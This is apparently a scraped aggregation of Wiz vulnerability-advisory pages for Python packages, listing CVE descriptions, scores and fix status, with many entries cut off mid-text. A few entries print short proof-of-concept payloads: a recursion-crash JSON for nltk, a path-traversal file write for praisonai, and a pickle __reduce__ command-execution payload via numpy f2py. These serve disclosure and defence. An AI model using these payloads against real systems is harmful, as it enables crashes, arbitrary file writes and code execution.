Products.isurlinportal is a replacement for isURLInPortal method in Plone. Prior to versions 2.1.0, 3.1.0, and 4.0.0, a url /login?came_from=////evil.example may redirect to an external website after login. This issue has been patched in versions 2.1.0, 3.1.0, and 4.0.0.
Source : NVD
## 6.1
Score
Published March 5, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
products.isurlinportal
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get
Wiz
CVE-2026-27489 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-27489 [HIGH] CVE-2026-27489 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27489 :
Python vulnerability analysis and mitigation
Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, a path traversal vulnerability via symlink allows to read arbitrary files outside model or user-provided directory. This issue has been patched in version 1.21.0.
Source : NVD
## 8.7
Score
Published April 1, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
onnx
Sources
NVD
Debian 11, 12, 13, 14 No Fix Added at: Apr 05, 2026
Echo No Fix Added at: Apr 0
Wiz
CVE-2026-27459 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-27459 [HIGH] CVE-2026-27459 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27459 :
Python vulnerability analysis and mitigation
set_cookie_generate_callback
Source : NVD
## 7.2
Score
Published March 18, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
Python
CBL Mariner
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
localstack
rust-asn1_derive-devel
Sources
NVD
CBL-Mariner 3.0 Severity HIGH Has Fix Added at: Mar 29, 2026
Chainguard Has Fix Added at: Mar 18, 2026
Container-Optimized OS Severity CRITICAL Has Fix Added at: Apr 02, 2026
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity CRITICAL Has Fix Added at: Mar 19, 2026
Ech
Wiz
CVE-2026-33718 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.6
CVE-2026-33718 [HIGH] CVE-2026-33718 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33718 :
Python vulnerability analysis and mitigation
get_git_diff()
openhands/runtime/utils/git_handler.py:134
path
/api/conversations/{conversation_id}/git/diff
Source : NVD
## 7.6
Score
Published March 27, 2026
Severity HIGH
CNA Score 7.6
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 53.6
Exploitation Probability (EPSS) 0.3
Affected packages and libraries
openhands
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Techn
Wiz
GHSA-rf74-v2fm-23pw Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-rf74-v2fm-23pw Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-rf74-v2fm-23pw :
Python vulnerability analysis and mitigation
## Summary
JSONTaggedDecoder.decode_obj()
nltk/jsontags.py
sys.getrecursionlimit()
RecursionError
## Affected code
nltk/jsontags.py
@classmethod
def decode_obj(cls, obj):
if isinstance(obj, dict):
obj = {key: cls.decode_obj(val) for (key, val) in obj.items()}
elif isinstance(obj, list):
obj = list(cls.decode_obj(val) for val in obj)
## Proof of Concept
import sys, json
from nltk.jsontags import JSONTaggedDecoder
depth = sys.getrecursionlimit() + 50 # e.g. 1050
payload = '{"x":' * depth + "null" + "}" * depth
# Raises RecursionError, crashing the process
json.loads(payload, cls=JSONTaggedDecoder)
## Impact
JSONTaggedDecoder
nltk/data.py
## Suggested Fix
Add a depth parameter with a hard limit:
@
Wiz
GHSA-3rcm-vjrc-p45j Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-3rcm-vjrc-p45j Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-3rcm-vjrc-p45j :
Python vulnerability analysis and mitigation
## Summary
to_markdown()
to_html()
## Details
...
to_markdown()
html_passthrough=True
## Proof of Concept
## General case
from justhtml import JustHTML
doc = JustHTML(" ", fragment=True)
print(doc.to_html())
print()
print(doc.to_markdown())
Source : NVD
## 5.3
Score
Published March 18, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
justhtml
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 19, 2026
## Get a CVE risk assessment
Get a prioritized view of
Wiz
CVE-2026-28350 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-28350 [MEDIUM] CVE-2026-28350 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28350 :
Python vulnerability analysis and mitigation
lxml.html.clean
Source : NVD
## 6.1
Score
Published March 5, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Python
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python-lxml-html-clean
py3-lxml-html-clean
Sources
NVD
Alpine 3.21, 3.22 Severity MEDIUM No Fix Added at: Mar 10, 2026
Chainguard Has Fix Added at: Mar 10, 2026
Debian 13 Severity MEDIUM No Fix Added at: Mar 08, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Mar 08, 2026
Echo Severity MEDIUM No Fix Added at: Mar 08, 2026
pip Severity MEDIUM Has Fix Added
Wiz
CVE-2026-39305 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-39305 [CRITICAL] CVE-2026-39305 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39305 :
Python vulnerability analysis and mitigation
../
## Details
src/praisonai/praisonai/cli/features/action_orchestrator.py
target = workspace / step.target
_apply_step
workspace
step.target
target = workspace / step.target
workspace
FILE_CREATE
FILE_EDIT
## PoC
ActionStep
from praisonai.cli.features.action_orchestrator import ActionStep, ActionType, ActionStatus
# Payload targeting a file outside the workspace
step = ActionStep(
id="test_traversal",
action_type=ActionType.FILE_CREATE,
description="Malicious file write",
target="../../../../../../../tmp/orchestrator_pwned.txt",
params={"content": "pwned"},
status=ActionStatus.APPROVED
)
# When the orchestrator applies this step, it writes to the traversed path
# _apply_step(step)
## Impact
~/.ssh/a
Wiz
CVE-2026-28438 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-28438 [MEDIUM] CVE-2026-28438 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28438 :
Python vulnerability analysis and mitigation
CocoIndex is a data transformation framework for AI. Prior to version 0.3.34, the Doris target connector didn't verify the configured table name before creating some SQL statements (ALTER TABLE). So, in the application code, if the table name is provided by an untrusted upstream, it expose vulnerability to SQL injection when target schema change. This issue has been patched in version 0.3.34.
Source : NVD
## 6.9
Score
Published March 6, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
Wiz
CVE-2026-21439 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.0
CVE-2026-21439 [LOW] CVE-2026-21439 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21439 :
Python vulnerability analysis and mitigation
badkeys is a tool and library for checking cryptographic public keys for known vulnerabilities. In versions 0.0.15 and below, an attacker may inject content with ASCII control characters like vertical tabs, ANSI escape sequences, etc., that can create misleading output of the badkeys command-line tool. This impacts scanning DKIM keys (both --dkim and --dkim-dns), SSH keys (--ssh-lines mode), and filenames in various modes. This issue is fixed in version 0.0.16.
Source : NVD
## 2
Score
Published January 6, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Python
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS
Wiz
CVE-2026-27457 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-27457 [MEDIUM] CVE-2026-27457 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27457 :
Python vulnerability analysis and mitigation
AddonViewSet
weblate/api/views.py
queryset = Addon.objects.all()
get_queryset()
REQUIRE_LOGIN
GET /api/addons/
GET /api/addons/{id}/
Source : NVD
## 4.3
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
weblate
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
Wiz
CVE-2025-61492 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2025-61492 [CRITICAL] CVE-2025-61492 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61492 :
Python vulnerability analysis and mitigation
A command injection vulnerability in the execute_command function of terminal-controller-mcp 0.1.7 allows attackers to execute arbitrary commands via a crafted input.
Source : NVD
## 10
Score
Published January 7, 2026
Severity CRITICAL
CNA Score 10.0
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 72.3
Exploitation Probability (EPSS) 0.7
Affected packages and libraries
terminal-controller
Sources
NVD
pip Severity CRITICAL No Fix Added at: Jan 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's lis
Wiz
CVE-2026-35044 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-35044 [HIGH] CVE-2026-35044 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35044 :
Python vulnerability analysis and mitigation
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.38, the Dockerfile generation function generate_containerfile() in src/bentoml/_internal/container/generate.py uses an unsandboxed jinja2.Environment with the jinja2.ext.do extension to render user-provided dockerfile_template files. When a victim imports a malicious bento archive and runs bentoml containerize, attacker-controlled Jinja2 template code executes arbitrary Python directly on the host machine, bypassing all container isolation. This vulnerability is fixed in 1.4.38.
Source : NVD
## 8.8
Score
Published April 6, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public
Wiz
CVE-2026-21226 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-21226 [HIGH] CVE-2026-21226 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21226 :
Python vulnerability analysis and mitigation
Deserialization of untrusted data in Azure Core shared client library for Python allows an authorized attacker to execute code over a network.
Source : NVD
## 7.5
Score
Published January 13, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Azure CLI
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 82.2
Exploitation Probability (EPSS) 1.7
Affected packages and libraries
request-1276
az
Sources
NVD
Chainguard Has Fix Added at: Jan 21, 2026
pip Severity HIGH Has Fix Added at: Jan 14, 2026
MinimOS Severity HIGH Has Fix Added at: Feb 04, 2026
Wolfi Has Fix Added at: Jan 21, 2026
## Get a CVE risk asses
Wiz
CVE-2025-67511 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.6
CVE-2025-67511 [CRITICAL] CVE-2025-67511 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67511 :
Python vulnerability analysis and mitigation
Cybersecurity AI (CAI) is an open-source framework for building and deploying AI-powered offensive and defensive automation. Versions 0.5.9 and below are vulnerable to Command Injection through the run_ssh_command_with_credentials() function, which is available to AI agents. Only password and command inputs are escaped in run_ssh_command_with_credentials to prevent shell injection; while username, host and port values are injectable. This issue does not have a fix at the time of publication.
Source : NVD
## 9.6
Score
Published December 11, 2025
Severity CRITICAL
CNA Score 9.6
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitatio
Wiz
CVE-2026-32247 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-32247 [HIGH] CVE-2026-32247 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32247 :
Python vulnerability analysis and mitigation
Graphiti is a framework for building and querying temporal context graphs for AI agents. Graphiti versions before 0.28.2 contained a Cypher injection vulnerability in shared search-filter construction for non-Kuzu backends. Attacker-controlled label values supplied through SearchFilters.node_labels were concatenated directly into Cypher label expressions without validation. In MCP deployments, this was exploitable not only through direct untrusted access to the Graphiti MCP server, but also through prompt injection against an LLM client that could be induced to call search_nodes with attacker-controlled entity_types values. The MCP server mapped entity_types to SearchFilters.node_labels, which then reached the vulnerable Cy
Wiz
CVE-2026-23986 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-23986 [MEDIUM] CVE-2026-23986 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23986 :
Python vulnerability analysis and mitigation
--UNSAFE,--trust
_preserve_symlinks: true
Source : NVD
## 6.9
Score
Published January 21, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
copier
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 22, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 04, 2026
Nix Severity HIGH Has Fix Added at: Feb 04, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vu
Wiz
CVE-2023-7333 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2023-7333 [MEDIUM] CVE-2023-7333 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-7333 :
Python vulnerability analysis and mitigation
A weakness has been identified in bluelabsio records-mover up to 1.5.4. The affected element is an unknown function of the component Table Object Handler. This manipulation causes sql injection. The attack needs to be launched locally. Upgrading to version 1.6.0 is sufficient to fix this issue. Patch name: 3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa. You should upgrade the affected component.
Source : NVD
## 4.8
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
rec
Wiz
GHSA-r48f-3986-4f9c Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-r48f-3986-4f9c Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-r48f-3986-4f9c :
Python vulnerability analysis and mitigation
## Our analysis
UnusedVariables
## Original report
Title: UnusedVariables analysis bypass via BUILD opcode Arbitrary File Read through fickling.load()
## Summary
Two independent bugs in fickling's AST-based static analysis combine to allow a malicious pickle file to execute arbitrary stdlib function calls - including reading sensitive files - while check_safety() returns Severity.LIKELY_SAFE and fickling.load() completes without raising UnsafeFileError.
A server using fickling.load() as a security gate before deserializing untrusted pickle data (its documented use case) is fully bypassed. The attacker receives the contents of any file readable by the server process as the return value of fickling.load().
##
Wiz
CVE-2026-4270 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
CVE-2026-4270 [CRITICAL] CVE-2026-4270 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4270 :
Python vulnerability analysis and mitigation
Improper Protection of Alternate Path exists in the no-access and workdir feature of the AWS API MCP Server versions >= 0.2.14 and < 1.3.9 on all platforms may allow the bypass of intended file access restriction and expose arbitrary local file contents in the MCP client application context.
To remediate this issue, users should upgrade to version 1.3.9.
Source : NVD
## 6.8
Score
Published March 16, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
awslabs.aws-api-mcp-server
Sources
NV
Wiz
CVE-2025-53000 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2025-53000 [HIGH] CVE-2025-53000 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-53000 :
Python vulnerability analysis and mitigation
inkscape.bat
jupyter nbconvert --to pdf
inkscape.bat
Source : NVD
## 8.5
Score
Published December 17, 2025
Severity HIGH
CNA Score 8.5
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
py3-nbconvert
nbconvert
Sources
NVD
Chainguard Has Fix Added at: Jan 30, 2026
Debian 11, 12, 13, 14 No Fix Added at: Dec 21, 2025
Echo No Fix Added at: Dec 21, 2025
pip Severity HIGH Has Fix Added at: Dec 21, 2025
Wolfi Has Fix Added at: Jan 30, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your c
Wiz
CVE-2025-67729 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2025-67729 [HIGH] CVE-2025-67729 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67729 :
Python vulnerability analysis and mitigation
LMDeploy is a toolkit for compressing, deploying, and serving LLMs. Prior to version 0.11.1, an insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weights_only=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim's machine when they load a malicious .bin or .pt model file. This issue has been patched in version 0.11.1.
Source : NVD
## 8.8
Score
Published December 26, 2025
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.2
Exploitation Probability (EPSS)
Wiz
CVE-2026-23996 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.7
CVE-2026-23996 [LOW] CVE-2026-23996 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23996 :
Python vulnerability analysis and mitigation
FastAPI Api Key provides a backend-agnostic library that provides an API key system. Version 1.1.0 has a timing side-channel vulnerability in verify_key(). The method applied a random delay only on verification failures, allowing an attacker to statistically distinguish valid from invalid API keys by measuring response latencies. With enough repeated requests, an adversary could infer whether a key_id corresponds to a valid key, potentially accelerating brute-force or enumeration attacks. All users relying on verify_key() for API key authentication prior to the fix are affected. Users should upgrade to version 1.1.0 to receive a patch. The patch applies a uniform random delay (min_delay to max_delay) to all responses regard
Wiz
GHSA-vmwq-8g8c-jm79 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-vmwq-8g8c-jm79 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-vmwq-8g8c-jm79 :
Python vulnerability analysis and mitigation
## Impact
save_report
openchatbi/tool/save_report.py
file_format
file_format
file_format.lstrip(".")
/../../
file_format
__init__.py
## Patches
Affected versions:<=0.2.1
Patched versions:
0.2.2 (includes fix from PR #12: https://github.com/zhongyu09/openchatbi/pull/12 )
## Workarounds
No
## References
Issue #10: https://github.com/zhongyu09/openchatbi/issues/10
PR #12: https://github.com/zhongyu09/openchatbi/pull/12
Source : NVD
## 8.7
Score
Published March 2, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probabi
Wiz
CVE-2026-24780 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-24780 [HIGH] CVE-2026-24780 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24780 :
Python vulnerability analysis and mitigation
disabled
BlockInstallationBlock
__import__()
Source : NVD
## 8.6
Score
Published January 29, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 30.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
agpt
Sources
NVD
pip Severity HIGH No Fix Added at: Jan 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
Wiz
CVE-2026-33744 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-33744 [HIGH] CVE-2026-33744 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33744 :
Python vulnerability analysis and mitigation
docker.system_packages
bentofile.yaml
RUN
system_packages
bentofile.yaml
bentoml containerize
docker build
Source : NVD
## 7.8
Score
Published March 27, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
bentoml
Sources
NVD
pip Severity HIGH Has Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Techno
Wiz
CVE-2026-35526 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-35526 [HIGH] CVE-2026-35526 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35526 :
Python vulnerability analysis and mitigation
graphql-transport-ws
graphql-ws
asyncio.Task
Operation
asyncio.Task
Source : NVD
## 7.5
Score
Published April 6, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
strawberry-graphql
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 06, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV
Wiz
CVE-2026-22779 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-22779 [MEDIUM] CVE-2026-22779 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22779 :
Python vulnerability analysis and mitigation
BlackSheep is an asynchronous web framework to build event based web applications with Python. Prior to 2.4.6, the HTTP Client implementation in BlackSheep is vulnerable to CRLF injection. Missing headers validation makes it possible for an attacker to modify the HTTP requests (e.g. insert a new header) or even create a new HTTP request. Exploitation requires developers to pass unsanitized user input directly into headers.The server part is not affected because BlackSheep delegates to an underlying ASGI server handling of response headers. This vulnerability is fixed in 2.4.6.
Source : NVD
## 6.3
Score
Published January 14, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Python
Has Public Exploit No
Has
Wiz
CVE-2026-22691 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.7
CVE-2026-22691 [LOW] CVE-2026-22691 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22691 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to version 6.6.0, pypdf has possible long runtimes for malformed startxref. An attacker who uses this vulnerability can craft a PDF which leads to possibly long runtimes for invalid startxref entries. When rebuilding the cross-reference table, PDF files with lots of whitespace characters become problematic. Only the non-strict reading mode is affected. Only the non-strict reading mode is affected. This issue has been patched in version 6.6.0.
Source : NVD
## 2.7
Score
Published January 10, 2026
Severity LOW
CNA Score 2.7
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-28351 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-28351 [MEDIUM] CVE-2026-28351 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28351 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to version 6.7.4, an attacker who uses this vulnerability can craft a PDF which leads to large memory usage. This requires parsing the content stream using the RunLengthDecode filter. This has been fixed in pypdf 6.7.4. As a workaround, consider applying the changes from PR #3664.
Source : NVD
## 6.9
Score
Published February 27, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nemo
open-webui
Sources
NVD
Chainguar
Wiz
CVE-2025-62348 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2025-62348 [HIGH] CVE-2025-62348 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-62348 :
Python vulnerability analysis and mitigation
Salt's junos execution module contained an unsafe YAML decode/load usage. A specially crafted YAML payload processed by the junos module could lead to unintended code execution under the context of the Salt process.
Source : NVD
## 7.3
Score
Published January 30, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
Python
SaltStack
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
salt-ssh
salt-doc
Sources
NVD
Alpine 3.22 Severity HIGH Has Fix Added at: Nov 26, 2025
Alpine 3.23 Severity HIGH Has Fix Added at: Dec 04, 2025
Alpine edge Severit
Wiz
CVE-2026-32608 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0
CVE-2026-32608 [HIGH] CVE-2026-32608 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32608 :
Python vulnerability analysis and mitigation
{{name}}
{{key}}
secure_popen()
subprocess.Popen(shell=False)
Source : NVD
## 7
Score
Published March 18, 2026
Severity HIGH
CNA Score 7.0
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
glances
Sources
NVD
Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH No Fix Added at: Mar 19, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 19, 2026
Echo Severity HIGH No Fix Added at: Mar 19, 20
Wiz
GHSA-r8g5-cgf2-4m4m Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-r8g5-cgf2-4m4m Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-r8g5-cgf2-4m4m :
Python vulnerability analysis and mitigation
## Summary
An unsafe deserialization vulnerability allows an attacker to execute arbitrary code on the host when loading a malicious pickle payload from an untrusted source.
## Details
numpy.f2py.crackfortran
eval
getlincoef
_eval_length
numpy.f2py
## PoC
from numpy.f2py.crackfortran import getlincoef
class EvilClass:
def __reduce__(self):
payload = "__import__('os').system('echo \"successful attack\"')"
return getlincoef, (payload, [])
## Impact
picklescan
## Note
picklescan
Source : NVD
## 8.9
Score
Published December 29, 2025
Severity HIGH
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Explo
Wiz
CVE-2026-29039 Impact, Exploitability, and Mitigation Steps | Wiz
